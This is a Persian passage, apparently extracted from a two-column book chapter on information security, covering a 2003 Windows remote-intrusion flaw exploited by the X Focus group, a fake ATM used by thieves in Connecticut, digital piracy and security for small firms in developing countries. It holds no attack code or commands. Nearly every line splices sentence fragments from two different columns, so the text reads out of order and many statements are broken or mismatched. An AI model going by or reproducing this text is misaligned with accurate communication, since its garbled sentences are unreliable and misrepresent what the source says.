‫ﺳﺎﺭﻗﻴﻦ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺑﻪ ﻧﺤﻮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ ﻛـﻪ‬ ‫ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬﺎ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﺁﺳﻴﺐ ﻭﺍﺭﺩ ﻛﺮﺩ‪ .‬ﺩﺭ‬
‫ﺍﻣﻜﺎﻥ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻣـﺪﺗﻲ ﺑﻌـﺪ ﻭ ﺑـﺎ‬ ‫ﺍﺩﺍﻣﻪ‪ ،‬ﻳﻚ ﻧﻤﻮﻧﻪ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺛﺒﺖﺷﺪﻩ ﺍﻗﺪﺍﻡ ﺑﻪ ﺳﺮﻗﺖ ﻣﻲﻧﻤﻮﺩﻧﺪ‪.‬‬ ‫ﺳﻨﺪ ‪ CA-203-18‬ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﻞ ﻣﺸﺎﻫﺪﻩ ﺩﺭ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﺗﻮﺳﻂ ﺍﻓـﺮﺍﺩ‬‫ﺍﮔﺮﭼﻪ ﺑﻴﺸﺘﺮ ﺟﺮﺍﺋ ﹺﻢ ﻗﺎﺑ ﹺ‬ ‫ﺁﺧﺮﻳﻦ ﺣﻔﺮﺓ ‪ Windows‬ﺭﺍ ﻣﺴﺘﻨﺪ ﻛﺮﺩﻩ‪ ،‬ﻭ ‪ CNet‬ﻧﻴﺰ‬
‫ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪ ،‬ﻭﻟﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻣﺆﺳـﺴﺎﺕ ﻧﻴـﺰ ﻗـﺎﺩﺭ ﺑـﻪ ﺳـﻮﺀ‬ ‫ﮔﺰﺍﺭﺵ ﺩﺍﺩﻩ ﻛﻪ ﺑﺎ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺍﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺑﺮﺍﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﺍﻳـﻦ ﻓـﻀﺎ ﺑـﺮﺍﻱ ﺭﺳـﻴﺪﻥ ﺑـﻪ ﺍﻫـﺪﺍﻑ‬ ‫ﻧﻔﻮﺫ ﺑﻪ ‪ Windows‬ﺭﺍﻩ ﺑﺮﺍﻱ ﻇﻬﻮﺭ ﺑـﺮﻕﺁﺳـﺎ ﻭ ﺣﻤﻠـﺔ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺧﻮﺩ ﻫﺴﺘﻨﺪ‪ .‬ﺟـﺮﺍﺋﻢ ﺳـﺎﺯﻣﺎﻧﺪﻫﻲﺷـﺪﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫ﺷﺪﻳﺪ ﻳﻚ ﻛﺮﻡ ﺩﻳﮕﺮ ﻫﻤﻮﺍﺭ ﻣﻲﺷﻮﺩ‪:‬‬
‫ﺩﺳﺘﻜﺎﺭﻱ ﺩﺭ ﺷﺒﻜﺔ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﺭﺳﻴﺪﻥ ﺑـﻪ ﻧﺘـﺎﻳﺞ ﻣﻄﻠـﻮﺏ‬ ‫ﭘﮋﻭﻫﺸﮕﺮﺍﻥ ﺍﻣﻨﻴﺘﻲ ﻫـﺸﺪﺍﺭ ﺩﺍﺩﻩﺍﻧـﺪ ﻛـﻪ ﻳـﻚ ﮔـﺮﻭﻩ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﻋﻠﻴـﻪ ﺩﻳﮕـﺮﺍﻥ ﻧﻴـﺰ‬ ‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﻣﻨﺘـﺸﺮ ﻛـﺮﺩﻩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺳـﻮﺀ‬
‫ﺑﺸﻮﺩ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻋﻼﻗـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﻛـﻪ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺍﺷﻜﺎﻝ ﻋﻤﺪﺓ ‪ Windows‬ﻃﺮﺍﺣﻲ ﺷـﺪﻩ‬
‫ﻧﺘﻴﺠﺔ ﻳﻚ ﻧﻈﺮﺳﻨﺠﻲ ﻳﺎ ﺣﺘﻲ ﺍﻧﺘﺨﺎﺑﺎﺕ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻛﻨﻨـﺪ ﺗـﺎ‬ ‫ﻭ ﺭﺍﻩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠـﺔ ﺑـﺰﺭﮒ ﺗـﺎ ﺍﻭﺍﺧـﺮ ﻫﻔﺘـﺔ‬
‫ﺑﻪ ﻧﺘﺎﻳﺞ ﻣﻄﻠﻮﺏ ﺧﻮﺩ ﺑﺮﺳﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻣﺆﺳﺴﺎﺕ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ‬
‫ﺟﺎﺭﻱ ﺑﺎﺯ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻫﺸﺪﺍﺭ ﺭﻭﺯ ﺟﻤﻌﻪ ﺍﻋﻼﻡ ﺷﺪ؛ ﺑﻌـﺪ‬
‫ﺭﻭﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻣﻤﻜـﻦ‬ ‫ﺍﺯ ﺁﻧﻜﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﭼﻴﻨﻲ ﮔﺮﻭﻩ ﺍﻣﻨﻴﺘـﻲ ‪ X Focus‬ﻣـﺘﻦ‬
‫ﺍﺳﺖ ﺑﺘﻮﺍﻧﻨﺪ ﺗﺎ ﻣﺪﺗﻬﺎ ﺁﻧﺮﺍ ﻫﻤﭽﻨﺎﻥ ﺑﺎ ﻗﻮﺕ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ‪.‬‬ ‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﺭﺍ ﺑﺮﺍﻱ ﭼﻨﺪﻳﻦ ﻣﺮﻛﺰ ﺍﻣﻨﻴﺘﻲ ﺩﻧﻴﺎ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻧﺪ‬
‫ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﻣﻨﺎﻓﻊ ﺑﺎﻟﻘﻮﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﻋـﺼﺮ ﻧـﻮﻳﻦ ﺩﻳﺠﻴﺘـﺎﻝ‬ ‫ﻛﻪ ﺑﺎ ﻃﺮﺍﺣﻲ ﻣﺎﻫﺮﺍﻧﻪ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﺍﺭﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ‬
‫ﺑﻴﺸﻤﺎﺭ ﻫﺴﺘﻨﺪ‪ .‬ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳـﺖ ﻛـﻪ ﺑـﺎ ﺍﻳﻤـﻦﺳـﺎﺯﻱ‬ ‫‪ Windows‬ﻧﻔﻮﺫ ﻣﻲﻛﺮﺩ‪.‬‬
‫ﻣﺤﻴﻂ ﻓﻴﺰﻳﻜﻲ‪ ،‬ﺯﻳﺮﺳﺎﺧﺘﻬﺎ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﻫﺎ‪ ،‬ﺧﻄﻮﻁ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﻣﻨـﺎﺑﻊ‬ ‫ﺑﺮﻧﺎﻣـــﺔ ﮔـــﺮﻭﻩ ‪ X Focus‬ﺍﺯ ﺍﺷـــﻜﺎﻝ ﻣﻮﺟـــﻮﺩ ﺩﺭ‬
‫ﻲ ﺧﻮﺩ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﻓﻊ ﺣﻔﺎﻇﺖ ﻛﻨﻴﻢ‪ .‬ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺩﺭ ﺍﻧﺠﺎﻡ‬‫ﺍﻃﻼﻋﺎﺗ ﹺ‬ ‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﻬﺮﻩﺑـﺮﺩﺍﺭﻱ ﻣـﻲﻛﻨـﺪ ﻭ ﺑـﻪ‬
‫ﺍﻳﻦ ﻣﻬﻢ ﺭﺳﻴﺪﻥ ﺑﻪ ﺳﻄﺢ ﺷﻨﺎﺧﺖ ﻛﺎﻓﻲ ﻭ ﺻﺤﻴﺢ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ‬ ‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﻣﻜﺎﻥ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﻣـﻲﺩﻫـﺪ‪.‬‬
‫ﻲ‬
‫ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﺗﺨﺎﺫ ﺗﺼﻤﻴﻤﺎﺕ ﻋﺎﻗﻼﻧﻪ ﺩﺭﺑﺎﺭﺓ ﭼﮕﻮﻧﮕ ﹺ‬ ‫ﺍﻳــﻦ ﺍﺷــﻜﺎﻝ ﺗﻮﺳــﻂ ﭼﻨــﺪ ﻧﻔــﺮ ﺍﺯ ﻣﺘﺨﺼــﺼﻴﻦ ﺑﻌﻨــﻮﺍﻥ‬
‫ﺭﺳﻴﺪﻥ ﺑﻪ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﺎ ﻛﻤﻚ ﻛﻨﺪ‪ .‬ﺑـﺴﻴﺎﺭﻱ‬ ‫ﺑﺰﺭﮔﺘﺮﻳﻦ ﺍﺷﻜﺎﻟﻲ ﻛﻪ ﺗـﺎ ﻛﻨـﻮﻥ ﺩﺭ ‪ Windows‬ﻳﺎﻓـﺖ‬
‫ﺍﺯ ﻣﺎ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﭼﻨﺪﻳﻦ ﻧﻘـﺶ ﺭﺍ ﺑـﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﻳـﻢ‪ :‬ﻣﻤﻜـﻦ‬ ‫‪٦١‬‬
‫ﺷﺪﻩ ﻣﻌﺮﻓﻲ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﺳﺖ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﻴﻢ‪ ،‬ﺩﺭ‬
‫ﻗﺒﺎﻝ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻭ ﺧﺪﻣﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ‬ ‫ﺣﻤﻼﺕ ﺭﻭﺯﺍﻓﺰﻭﻧﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻧـﺴﺒﺘﹰﺎ ﻏﻴﺮﺣﺮﻓـﻪﺍﻱ ﺍﻧﺠـﺎﻡ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ‪ ،‬ﻭ ﻳﺎ ﺑﻪ ﻫﻤﻜﺎﺭﻱ ﺑـﺎ ﺩﻭﻟـﺖ ﺩﺭ ﺍﺟـﺮﺍﻱ‬ ‫ﻣﻲﺷﻮﻧﺪ ﻧﻴﺰ ﻣﺎﺟﺮﺍﻳﻲ ﻃﻮﻻﻧﻲ ﻭ ﺩﻧﺒﺎﻟﻪﺩﺍﺭ ﺍﺳﺖ‪.‬‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﻤﺎﻳﺘﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻋﻼﻗﻪﻣﻨﺪ ﺑﺎﺷﻴﻢ‪.‬‬ ‫ﺍﻟﺒﺘﻪ ﺗﻤـﺎﻣﻲ ﻧﻘـﺾ ﺣﺮﻳﻤﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﺨـﺘﺺ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ‬
‫ﻫﻤﺔ ﻣﺎ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻧﻘﺸﻬﺎ ﺩﺭ ﻗﺒﺎﻝ ﺗﺤﻘﻖ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ‬ ‫ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ ﻧﻴـﺰ ﺗـﺎ ﻛﻨـﻮﻥ ﺑـﺮﺍﻱ‬
‫ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﺴﺌﻮﻝ ﻫـﺴﺘﻴﻢ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ‬ ‫ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪ .‬ﺩﺭ ﻳﻚ‬
‫ﻻ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺍﻣﻨﻴـﺖ ﺿـﻌﻴﻔﺘﺮﻳﻦ ﺟـﺰ ِﺀ ﺁﻥ ﻣﺤـﻴﻂ‬
‫ﭘﻴﭽﻴﺪﻩ ﻣﻌﻤﻮ ﹰ‬ ‫ﻣﻮﺭﺩ )ﺩﺭ ﺍﻳﺎﻟﺖ ﻛﺎﻧﻜﺘﻴﻜﺎﺕ‪ ٦٢‬ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ( ﺳﺎﺭﻗﻴﻦ ﺍﻗﺪﺍﻡ ﺑﻪ ﻧـﺼﺐ‬
‫ﺍﺳﺘﺤﻜﺎﻡ ﺩﺍﺭﺩ؛ ﺍﺯ ﺍﻳﻨﺮﻭ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﻛﻪ ﺍﺟﺰﺍﻱ ﻣﺤﻴﻄـﻲ‬ ‫ﺩﺳﺘﮕﺎﻫﻲ ﺷﺒﻴﻪ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺩﺭ ﻳﻚ ﻣﺮﻛﺰ ﺧﺮﻳﺪ ﻛﺮﺩﻧـﺪ‪.‬‬
‫ﻦ‬
‫ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻛﻨﺘﺮﻝ ﺩﺍﺭﻳﻢ ﺁﻧﻘﺪﺭ ﻗﻮﻱ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺿـﻌﻴﻔﺘﺮﻳ ﹺ‬
‫‪61‬‬ ‫‪CNet News.com ,July 25,2003‬‬
‫‪62‬‬ ‫‪Connecticut State‬‬
‫‪٤١‬‬ ‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬

‫ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻳﻚ ﺭﺍﻫﻜـﺎﺭ ﺟـﺎﻳﮕﺰﻳﻦ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﻳﺖ‬ ‫ﺁﻧﻬﺎ ﻫﻢ ﺍﺯ ﺗﻮﺍﻧﺎﻳﻲ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﻮﺟـﻮﺩ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
‫ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺧﺮﻳﺪ ﻣﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﺩ؛ ﺭﻭﺷـﻲ ﻛـﻪ ﺍﮔـﺮ ﺑـﺪﻭﻥ‬ ‫ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‬

‫ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻩ ﺭﺍ ﺑﺮﺍﻱ ﺭﻭﺷﻬﺎﻱ‬


‫ﺟﺪﻳﺪ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﺯ ﺑﮕﺬﺍﺭﺩ‪.‬‬ ‫ﺍﻫﻤﻴﺖ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳـﻂ ﺑﺎﻳـﺪ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺍﺻـﻼﺡ‬ ‫ﻣﺘﻮﺳﻂ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‬
‫ﻧﮕــﺮﺵ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺗﺠــﺎﺭﻱ ﺑــﺮﺍﻱ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺍﻳﻨﺘﺮﻧــﺖ‪،‬‬ ‫ﺑﺎ ﺍﻳﻨﻜﻪ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﻫﻤـﻪ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺑـﺮﺍﻱ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪﻱ ﺑـﺮﺍﻱ ﺁﻧﻬـﺎ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﺩﺍﺭﺩ‪ .‬ﻳﻜـﻲ ﺍﺯ ﺍﻳـﻦ‬ ‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﻫﻤﻴﺖ‬
‫ﺧﻄﺮﺍﺕ ﺍﺯ ﻫﻤﻪ ﺟﺪﻳﺪﺗﺮ ﺍﺳﺖ‪ :‬ﺍﺣﺘﻤﺎﻝ ﺑـﻪ ﺳـﺮﻗﺖ ﺭﻓـﺘﻦ ﻭ ﺩﺭ‬ ‫ﻭﻳﮋﻩ ﺍﻱ ﺩﺍﺭﺩ‪ .‬ﻧﺘﺎﻳﺞ ﺣﺎﺻﻞ ﺍﺯ ﻭﺭﻭﺩ ﺑﻪ ﺑﺎﺯﺍﺭ ﺟﻬـﺎﻧﻲ ﺑـﺎ ﻛﻤـﻚ‬
‫ﻣﻌﺮﺽ ﻓﺮﻭﺵ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺷـﺮﻛﺖ‪ .‬ﺩﺭ‬ ‫ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃــﺎﺕ ﺑــﺴﻴﺎﺭ ﻣﻄﻠــﻮﺏ ﺍﺳــﺖ‪ ،‬ﻭﻟــﻲ‬
‫ﻋﺼﺮﻱ ﻛـﻪ ﻛﺎﻻﻫـﺎ ﻭ ﺧـﺪﻣﺎﺕ ﻓﺮﻭﺧﺘـﻪﺷـﺪﻩ ﺭﺍ ﻣﺤـﺼﻮﻻﺕ‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺼﻮﺭﺕ ﻧﺎﺍﻣﻦ ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺍﺳﺎﺳﻲ ﺍﺳﺖ‪.‬‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺗﺸﻜﻴﻞ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺍﺣﺘﻤﺎﻝ ﺗﻮﺯﻳﻊ ﻭ ﺗﻬﻴـﺔ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺻﻨﺎﻑ ﺗﺠﺎﺭﻱ‪ ،‬ﻋﻤﻠﻴﺎﺕ ﺩﺳﺘﻲ ﺑـﻪ ﻣـﺪﻳﺮﻳﺖ ﺑـﺎ‬
‫ﺁﻧﻬﺎ ﺑﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ ﻭ ﻳـﺎ ﺩﺭ ﺑـﺎﺯﺍﺭ ﺳـﻴﺎﻩ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘـﻪ ﺍﺳـﺖ‪ .‬ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣـﺴﺘﻘﻞ‬
‫ﺍﻳﻨﺤﺎﻟﺖ ﻣﻨﺎﻓﻊ ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺳﺎﺭﻗﺎﻥ ﻣﻲﺭﺳﺪ‪ ،‬ﻭ ﻧﻪ ﺑﻪ ﺷﺮﻛﺘﻲ ﻛـﻪ‬
‫ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻋﺮﺻــﻪﻫــﺎﻱ ﺍﻗﺘــﺼﺎﺩﻱ ﻛــﺸﻮﺭﻫﺎﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺑﺮﺍﻱ ﻣﺪﺕﺯﻣﺎﻧﻲ ﻣﺸﺨﺺ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺑﺎ ﻣﻌﺮﻓـﻲ‬
‫ﺑﺎﺭﺯﺗﺮﻳﻦ ﻧﻤﻮﻧﺔ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻛﻪ ﺍﻣـﺮﻭﺯﻩ ﻣـﻲﺗـﻮﺍﻥ‬ ‫ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﺪﻳﺪ‪ ،‬ﻣﺪﻳﺮﺍﻥ ﺑﻪ ﺳﻤﺖ ﻭ ﺳﻮﻱ ﻛﺴﺐ ﺩﺍﻧﺶ ﻭ‬
‫ﻣﺸﺎﻫﺪﻩ ﻛـﺮﺩ ﺩﺭ ﺻـﻨﻌﺖ ﻣﻮﺳـﻴﻘﻲ ﺭﻭﺍﺝ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﻪ ﺗﻮﺯﻳـﻊ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺩﺭﺑﺎﺭﺓ ﻣﻮﺿﻮﻋﺎﺕ ﻛﺎﺭﺑﺮﺩﻱ ﭼﻮﻥ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ‪،٦٣‬‬
‫ﻣﺤﺼﻮﻻﺕ ﻣﺴﺮﻭﻗﻪ ﻭ ﻏﺎﻟﺒﹰﺎ ﻫﻢ ﺩﺭ ﻗﺎﻟﺐ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﻣﻨﺠـﺮ‬ ‫‪٦٤‬‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﺷﺒﻜﻪ‪ ،‬ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻣﻤﻴـﺰﻱ )ﺑـﺎﺯﺑﻴﻨﻲ(‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳـﺮﻣﺎﻳﻪ ﻫـﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ‬ ‫ﻲ ﻣـﻮﺍﺭﺩ‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺣﺮﻛﺖ ﻫﺴﺘﻨﺪ‪ .‬ﻛﺴﺐ ﻣﻮﻓﻘﻴـﺖ ﺩﺭ ﻫﻤﮕـ ﹺ‬
‫ﻣﺴﺌﻠﻪﺍﻱ ﺣﻞﻧﺸﺪﻩ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﻫﺮﭼﻨـﺪ ﺑـﺮﺍﻱ ﺣـﻞ ﺁﻥ ﺍﻗـﺪﺍﻣﺎﺕ‬ ‫ﻓــﻮﻕ ﻣــﺴﺘﻠﺰﻡ ﺁﺷــﻨﺎﻳﻲ ﺑــﺎ ﺭﺍﻳﺎﻧــﻪ‪ ،‬ﺷــﺒﻜﻪ‪ ،‬ﻭ ﻣﻔــﺎﻫﻴﻢ ﺍﻣﻨﻴــﺖ‬
‫ﺯﻳﺎﺩﻱ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺩﻳﺮﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺍﺳﺖ‪.‬‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻧـﺴﺨﻪﺑﺮﺩﺍﺭﻳﻬـﺎﻱ ﻧـﺴﺒﺘﹰﺎ ﻛـﺎﻣﻠﻲ ﺍﻧﺠـﺎﻡ‬
‫ﺑﺎ ﻣﻌﺮﻓﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻭ ﺍﻣﻜﺎﻥ ﻭﺭﻭﺩ ﺑﻪ ﻋﺮﺻـﺔ ﺗﺠـﺎﺭﺕ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺁﺳﺎﻥ ﺑﻮﺩﻩ ﻭ ﺣﻴﻦ ﻓﺮﻭﺵ‬
